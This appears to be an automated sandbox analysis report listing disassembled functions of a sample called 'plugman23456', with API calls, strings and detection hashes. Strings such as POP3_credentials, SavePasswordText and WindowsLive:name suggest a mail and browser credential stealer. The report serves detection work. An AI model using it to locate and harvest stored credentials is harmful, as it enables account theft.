                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                          • String ID: J$Microsoft_WinInet
                          • API String ID: 2203907242-260894208
                          • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                          • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                          • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                          • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                          Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                          • _mbscpy.MSVCRT ref: 00409686
                          • _mbscpy.MSVCRT ref: 00409696
                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                          • API String ID: 888011440-2039793938
                          • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                          • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                          Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • unable to open database: %s, xrefs: 0042EBD6
                          • database is already attached, xrefs: 0042EA97
                          • out of memory, xrefs: 0042EBEF
                          • database %s is already in use, xrefs: 0042E9CE
                          • cannot ATTACH database within transaction, xrefs: 0042E966
                          • too many attached databases - max %d, xrefs: 0042E951
                          • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                          • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                          • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                          • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                          Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                          • strchr.MSVCRT ref: 0040327B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileStringstrchr
                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                          • API String ID: 1348940319-1729847305
                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                          Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                          • API String ID: 3510742995-3273207271
                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                          Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                          • memset.MSVCRT ref: 0040FA1E
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                          • _strnicmp.MSVCRT ref: 0040FA4F
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                          • String ID: WindowsLive:name=*$windowslive:name=
                          • API String ID: 945165440-3589380929
                          • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                          • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                          • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                          • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                          Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004094C8
                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                          • memset.MSVCRT ref: 0040950C
                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                          • _strcmpi.MSVCRT ref: 00409531
                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                          • String ID: sysdatetimepick32
                          • API String ID: 3411445237-4169760276
                          • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                          • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                          Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                          • EndDialog.USER32(?,00000002), ref: 00405A96
                          • EndDialog.USER32(?,00000001), ref: 00405AA9
                            • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                            • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                            • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$DialogMessageSend
                          • String ID:
                          • API String ID: 2485852401-0
                          • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                          • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                          • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                          • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                          Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                          • GetSysColor.USER32(0000000F), ref: 0040B472
                          • DeleteObject.GDI32(?), ref: 0040B4A6
                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteImageLoadObject$Color
                          • String ID:
                          • API String ID: 3642520215-0
                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                          Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                          • GetDC.USER32(00000000), ref: 004072FB
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                          • String ID:
                          • API String ID: 1999381814-0
                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                          Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                          • API String ID: 1297977491-3883738016
                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                          Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                          • memcpy.MSVCRT ref: 0044972E
                          • memcpy.MSVCRT ref: 0044977B
                          • memcpy.MSVCRT ref: 004497F6
                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                          • memcpy.MSVCRT ref: 00449846
                          • memcpy.MSVCRT ref: 00449887
                          • memcpy.MSVCRT ref: 004498B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                          Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: __aulldvrm$__aullrem
                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                          • API String ID: 643879872-978417875
                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                          Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset$strlen$_memicmp
                          • String ID: user_pref("
                          • API String ID: 765841271-2487180061
                          • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                          • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                          • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                          • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                          Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405827
                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                          • memset.MSVCRT ref: 004058C3
                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                          • SetFocus.USER32(?), ref: 00405976
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$FocusItemmemset
                          • String ID:
                          • API String ID: 4281309102-0
                          • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                          • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                          • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                          • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                          Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                            • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                          • _mbscat.MSVCRT ref: 0040A8FF
                          • sprintf.MSVCRT ref: 0040A921
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileWrite_mbscatsprintfstrlen
                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                          • API String ID: 1631269929-4153097237
                          • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                          • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                          • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                          • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                          Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040810E
                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                          • String ID: POP3_credentials$POP3_host$POP3_name
                          • API String ID: 524865279-2190619648
                          • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                          • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                          Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetstrchr
                          • String ID: 0$6
                          • API String ID: 2300387033-3849865405
                          • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                          • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                          Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpystrlen$memsetsprintf
                          • String ID: %s (%s)
                          • API String ID: 3756086014-1363028141
                          • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                          • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                          • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                          • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                          Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscat$memsetsprintf
                          • String ID: %2.2X
                          • API String ID: 125969286-791839006
                          • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                          • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                          Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004091EC
                          • sprintf.MSVCRT ref: 00409201
                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                            • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                          • SetWindowTextA.USER32(?,?), ref: 00409228
                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                          • String ID: caption$dialog_%d
                          • API String ID: 2923679083-4161923789
                          • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                          • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                          Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • no such savepoint: %s, xrefs: 00426A02
                          • unknown error, xrefs: 004277B2
                          • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                          • abort due to ROLLBACK, xrefs: 00428781
                          • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                          • API String ID: 3510742995-3035234601
                          • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                          • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                          • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                          • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                          Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                          • API String ID: 2221118986-3608744896
                          • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                          • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                          • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
